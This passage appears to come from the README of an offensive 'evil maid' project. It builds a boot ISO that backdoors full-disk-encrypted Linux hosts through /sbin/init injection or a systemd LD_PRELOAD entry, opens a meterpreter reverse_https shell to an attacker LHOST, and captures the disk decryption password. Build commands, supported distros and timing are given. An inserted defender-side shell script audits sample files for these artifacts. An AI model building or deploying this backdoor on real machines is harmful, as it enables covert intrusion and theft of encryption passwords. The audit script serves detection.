(Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
(Fedora/CentOS) LD_PRELOAD.so into DefaultEnvironment, loaded globally, dropping a shell.
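The two persistence paths described above (a modified /sbin/init on the Debian family, an LD_PRELOAD entry in systemd's DefaultEnvironment on the Fedora family) each leave a host-side artifact that a defender can audit for. The script below is an added defender-side example, not part of this project; it assumes a baseline hash of /sbin/init taken before the machine left the owner's control, and it runs entirely on constructed sample files in a temp directory rather than touching the live system.

```shell
#!/bin/sh
# Added example (not project code): audit the two artifacts this README's
# technique leaves behind. All inputs below are constructed samples.

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

# Constructed systemd manager config carrying the injected setting.
cat > "$SAMPLE_DIR/tampered.conf" <<'EOF'
[Manager]
#DefaultEnvironment=
DefaultEnvironment=LD_PRELOAD=/lib/LD_PRELOAD.so
EOF

# Constructed clean config: only the stock commented-out default.
cat > "$SAMPLE_DIR/clean.conf" <<'EOF'
[Manager]
#DefaultEnvironment=
EOF

# Constructed stand-ins for /sbin/init and a pre-deployment baseline copy.
printf 'original init\n' > "$SAMPLE_DIR/init.baseline"
printf 'original init\n' > "$SAMPLE_DIR/init.untouched"
printf 'original init + injected .so\n' > "$SAMPLE_DIR/init.modified"

# Exit 0 when an active (uncommented) DefaultEnvironment= line sets LD_PRELOAD.
# The stock "#DefaultEnvironment=" comment is ignored by the anchored pattern.
has_preload_in_default_env() {
    grep -Eq '^[[:space:]]*DefaultEnvironment=.*LD_PRELOAD=' "$1"
}

# Exit 0 when the candidate file's SHA-256 equals the baseline file's SHA-256.
matches_baseline() {
    [ "$(sha256sum "$1" | cut -d' ' -f1)" = "$(sha256sum "$2" | cut -d' ' -f1)" ]
}

# Run both checks, print one line per finding, and end with a count line.
# Arguments: <systemd config> <init binary> <init baseline>. Always exits 0.
audit() {
    findings=0
    if has_preload_in_default_env "$1"; then
        echo "FINDING: LD_PRELOAD set via DefaultEnvironment in $1"
        findings=$((findings + 1))
    fi
    if ! matches_baseline "$2" "$3"; then
        echo "FINDING: $2 differs from baseline $3"
        findings=$((findings + 1))
    fi
    echo "findings: $findings"
}

# Usage on the constructed samples. On a real host the arguments would be
# /etc/systemd/system.conf, /sbin/init and an offline baseline copy (assumption:
# the baseline was captured before the machine was exposed).
audit "$SAMPLE_DIR/tampered.conf" "$SAMPLE_DIR/init.modified" "$SAMPLE_DIR/init.baseline"
```

On a packaged system the baseline comparison can be replaced by the package manager's own verification (for example dpkg's recorded md5sums or rpm's verify mode), but a hash captured and stored off-host before deployment is the check that still holds when the package database itself is on the tampered disk.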
Supported Distros
Ubuntu 14.04.3
Debian 8.2.0
Kali 2.0
Fedora 23
CentOS 7
Current Features
python/meterpreter/reverse_https to compile time LHOST
FDE decryption password stored in meterpreter environment (getenv PASSWORD)
Details
Compiling
See the Makefile for more information and configuration. LHOST is required in the environment to build the .so, because msfvenom is piped in at compile time. libcryptsetup-dev (or the equivalent package for your distro) must also be installed on the build machine.
Generic instructions (builds the ISO image in the cwd): LHOST=192.168.56.101 make rev.so iso
isolinux.cfg
The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0
Furthermore, the prompt value has been set to 0 to allow fully automated execution.
Timing
Approximate nefarious boot -> backdoored time: ~2 minutes
Approximate legit boot -> shell: ~90 seconds (configurable; we want networking up before us)
Prerequisites
core.d is an unpacked core.gz from TinyCore with the below packages merged in.
Core-current is an unpacked Core-current.iso.
The following packages have been installed inside TinyCore (python, filesystem support):